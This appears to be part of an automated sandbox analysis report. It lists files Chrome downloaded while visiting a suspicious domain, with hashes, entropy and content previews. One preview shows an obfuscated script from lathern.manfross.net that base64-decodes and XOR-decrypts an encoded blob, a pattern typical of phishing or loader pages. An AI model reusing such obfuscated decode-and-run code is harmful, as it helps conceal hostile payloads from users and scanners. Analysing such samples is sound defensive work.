                                                      Preview:.PNG........IHDR...p..........{......sBIT....|.d.....pHYs..;...;...3.+....tEXtSoftware.www.inkscape.org..<... .IDATx...w.]U....L.I(!.B..J..R....PD.z-.(...4Q..*MQ. .(..EE.AP:.....HI.... ....ur3..r.Y.|....z..3.2.g..{..Y.V..6.u...U...Q.Z.X......m..........^......O.^l......Y.)`|...:......x.:."0r...H.W.....,.......j.....L%]s../4.>.<.........S.$I.$I.$I.T....*.(`s`S`.`C`mR..J...6.x.x.x..z9.......g..j}R...h.1.t]=....n..#.f.I.$I.$I.$I%c.G.. 5il.l.lCj.(S.F;.....7...AZ.@*B....%.E....C.be3..K....S."CI.$I.$I.$I...jV.v.v.v$5l..M.ysI......x{/i...Y...o..m.......v.6.>R..$I.$I.$I.......F.{..6v!...1{.Y..9ng...S..TF.I..;.o&5A.....&.w....$5J..M$I.$I.$I.$.........Q;..IQ...9n.nl.Z.e.......j.`hd..{..=p-p=n."I.$I.$I.$eg.G...........8...i......b. [.{.V.........V...96GI.$I.$I.$IY...c ..R...Q.q..,..........Gm........X=6NW......clp.I.$I.$I.$IZ*..g...s...c...F.A.<z*.Q.a...+.?....8.Xn.GO.$I.$I.$I..,O.l....@.....z.....R..a$.:...I.yb-....l....$I.$I.$I.$.....$.'S..j.p..3NBGX..M.3.?.......p$I.$
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (14037), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):14037
                                                      Entropy (8bit):5.267255469849757
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:2AE4531C614FE7208A877DDB1C8779E7
                                                      SHA1:893FBFAC96E793791BAA78515DAC3832B47F82BD
                                                      SHA-256:745BE6E816F6B5BE994BCD8C59BE2070F42DA0AC994EA7731483844A398AADBF
                                                      SHA-512:7DEEDD50BF6001FBF24F6B03CE154F42DA177AA4DCE95A04E47F379756BF23B50FB9D4D2F919895E3D480139129CCDB2AE9250B75AA5527775EAE8F65A31BE21
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://beta.slimwiki.com/_next/static/css/8ce01ecddc2ceff8.css
                                                      Preview:.styles_wikiLoader__NQuet{display:flex;flex-direction:column}.styles_wikiLoader__NQuet>*{margin-bottom:48px}.styles_wikiLoader__NQuet>.styles_header__5AweK{display:flex;justify-content:space-between;flex-wrap:wrap}.styles_wikiLoader__NQuet>.styles_body__6ZzlY,.styles_wikiLoader__NQuet>.styles_footer__3kmx4{flex-direction:column}.styles_wikiLoader__NQuet>.styles_body__6ZzlY>*,.styles_wikiLoader__NQuet>.styles_footer__3kmx4>*{margin-bottom:8px}.styles_wikiLoader__NQuet>.styles_footer__3kmx4{margin-top:30vh}.styles_logoLoader__LfWZc{display:flex;align-items:center;justify-content:center;flex:1}.styles_animate__xY2QL{opacity:1;animation:styles_pulse__qY0fy .65s infinite alternate}.styles_tableLoader__2eeQW{margin:0 auto}.styles_loaderPadding__k0nVM{padding-top:30px}@keyframes styles_pulse__qY0fy{0%{opacity:.4}}.styles_loaderWrapper__6AIkd{margin-left:30px}.styles_obfuscatedHeader__hxDZG{display:flex;justify-content:space-between}.styles_obfuscatedTime__UXSzm{display:flex;align-items:center
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:HTML document, ASCII text, with very long lines (65209), with CRLF line terminators
                                                      Category:downloaded
                                                      Size (bytes):102524
                                                      Entropy (8bit):5.693439510124172
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:18EF6834F9C87C5E0A49D86F23EE51F4
                                                      SHA1:2F00D27D8E3B8EE87843AC0F1546DA655C8E1762
                                                      SHA-256:75C7AB91EF42CCF9C2FC4602C8010EE4D217C9DAE35C30898FFDD1061E8D12C1
                                                      SHA-512:004E9E59DD551B7B5E9C42C15B93CA2B51496D27D39E5090DC09F8DA99C7CA40C20598582E67D9F6E0F3557C6BF7A7EB3EC8436B4D710EFC7CF0E20C0C74ACFA
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://lathern.manfross.net/945934357436843pkdaiukzevckhpaoqxv?eibzlcepoftvuvjkaijdpteepjrbgxrqg
                                                      Preview:<script>..function rksbBSEWzl(RLIiFHOCpA, HlQkWhTmQJ) {..let goKrxEbyut = '';..RLIiFHOCpA = atob(RLIiFHOCpA);..let gcpfJATymg = HlQkWhTmQJ.length;..for (let i = 0; i < RLIiFHOCpA.length; i++) {.. goKrxEbyut += String.fromCharCode(RLIiFHOCpA.charCodeAt(i) ^ HlQkWhTmQJ.charCodeAt(i % gcpfJATymg));..}..return goKrxEbyut;..}..var uHeALJomMb = rksbBSEWzl(`a2IXDiAsLSY1UD83Pi1ddX5KGAQ6L3MtAhYTS1IVOWFtTGlEHBMRFGlOWWFDWFRKAxMlKiM1QwsGFU1SPzcnMRBCW1kTHzMmfSsSDREECV40LD5uCQkBEwIJenB9d01IWhsZHnkpIGNdRFsFEwI+Myd/bnJUVlBQazAwMwoIAFYDAjR+cSkXDAQFSl94IDcvTQsbFRsVI206LkxMWkBeQHgwPCIIHQBYGR95LjovTRIHVE5MeDAwMwoIAEh9endjc2FfCxcEGQAjYyAzAEVWHgQEJzBpbkwfHQIYBTVtMC4OVxITHgR4MTIvBx0MBl4aJGwhJA8dFQUVA3gnPDYNFBsXFF8hc311TUtbBBEeMyYrMU0VHRheGiRhbX1MCxcEGQAjfV5LQ1hUVkwDNDE6MRdYBwQTTXUrJzUTC05ZXxMzLTkyTRsYGQUUMS8yMwZWFxkdXzYpMjlMFB0UA180MSoxFxdZHANfY21ib1JXFwQJACMsfisQVhkfHl49MHF/X1cHFQIZJzdtTGlYVFZQTCQgISgTDFQFAhNqYTs1FwgHTF9fIDQkbwQXGxEcFXkgPCxMChEVEQAjIDsgTBkEH14aJGFtfUwLFwQZACN9XktDWFRWTBw+LThhER0YS1IDIzo/
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (12573), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):12573
                                                      Entropy (8bit):5.272282661052319
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:29914429841E384B54D6BF050F3D5A08
                                                      SHA1:C7F2C9F741A6D738C278F592E907850A383219A6
                                                      SHA-256:A69D3E718050C4448047743E7D1E03555D9990E38B58E2E056F85131A015462D
                                                      SHA-512:496CEFF9C76EFFAFCEB242037600FEA3E1CF90BC3ED45E3CC2E3CA504A6CD4AFA9C9A5AF4532A54AF0A9574F300E8FA964C65211FBCBF3C656282CCD4C757B2A
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://beta.slimwiki.com/_next/static/chunks/6736-f37c644e04ca4fac.js
                                                      Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6736],{27533:function(e,t,r){r.d(t,{B:function(){return l}});var n=r(2265),o=r(84104),a=r(61266),i=r(59143);function l(e){let t=e+"CollectionProvider",[r,l]=(0,o.b)(t),[s,u]=r(t,{collectionRef:{current:null},itemMap:new Map}),c=e+"CollectionSlot",d=n.forwardRef((e,t)=>{let{scope:r,children:o}=e,l=u(c,r),s=(0,a.e)(t,l.collectionRef);return n.createElement(i.g7,{ref:s},o)}),p=e+"CollectionItemSlot",f="data-radix-collection-item";return[{Provider:e=>{let{scope:t,children:r}=e,o=n.useRef(null),a=n.useRef(new Map).current;return n.createElement(s,{scope:t,itemMap:a,collectionRef:o},r)},Slot:d,ItemSlot:n.forwardRef((e,t)=>{let{scope:r,children:o,...l}=e,s=n.useRef(null),c=(0,a.e)(t,s),d=u(p,r);return n.useEffect(()=>(d.itemMap.set(s,{ref:s,...l}),()=>void d.itemMap.delete(s))),n.createElement(i.g7,{[f]:"",ref:c},o)})},function(t){let r=u(e+"CollectionConsumer",t);return n.useCallback(()=>{let e=r.collectionRef.current;if(!
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Web Open Font Format (Version 2), TrueType, length 93276, version 1.0
                                                      Category:downloaded
                                                      Size (bytes):93276
                                                      Entropy (8bit):7.997636438159837
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:BCD7983EA5AA57C55F6758B4977983CB
                                                      SHA1:EF3A009E205229E07FB0EC8569E669B11C378EF1
                                                      SHA-256:6528A0BF9A836A53DFD8536E1786BA6831C9D1FAA74967126FDDF5B2081B858C
                                                      SHA-512:E868A2702CA3B99E1ABBCBD40B1C90B42A9D26086A434F1CBAE79DFC072216F2F990FEC6265A801BC4F96DB0431E8F0B99EB0129B2EE7505B3FDFD9BB9BAFE90
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://lathern.manfross.net/efhWoYPc9J0AoSiorR48S34Ytc80ML9Dzav5Hmn93
                                                      Preview:wOF2......l\....... ..k...........................v...&..$?HVAR.j?MVAR.F.`?STAT.6'8.../.H........x....0..:.6.$..0. ..z...[....%"...........!.I.T....w.!c.H...t.]k......6..Cy..Ul.re........I..%.%....DE....v.i.QF8....iH.!r......P4Z[....Zs....o..r..8b.O....n...!......R}GL..5n!....^..I...A.....U...,&..uz....E.R.K/GL...#..U..A8%.rd..E,}...'e...u..3.dD....}..:..0.a..#O8.|.7..{.}.o......(.D..HX...w.;F...g.+....g.x..,.@~<.K......ZJw......^.!..{:..<..`N..h..0.t..NA..,...]........On./..X|_=...e,.tS..3Z..q_....'F[..jR.?U..k.:+;..Z.co5..l..yV.Md..4.6............L8q..._...AX.y.Cc...Agb..a.K...N....`-..N.b.u...q..i.S...p..j*...fA.......?.Z.Ee.~|.\..TZ._...?./a.64..+.]..(gq..d..\K...S..z.i.l[.........1=....I.....4g.?.G.3.&.0L&.$.@R6...U..o..:.S.=.....bU..u.]z.W8[U.|7.'.%..u...11..g<.^...J..PB.JHB...k........].($..D...S"u...7...9.8.....U..7...R$..x...g.X.zV.,.$....y.:.....Q$OM....q.. ...(.O....".d<.l..9..|^B.r.5......yi.D..._...<P..o....(Re.I...@E.~..T.
                                                      No static file info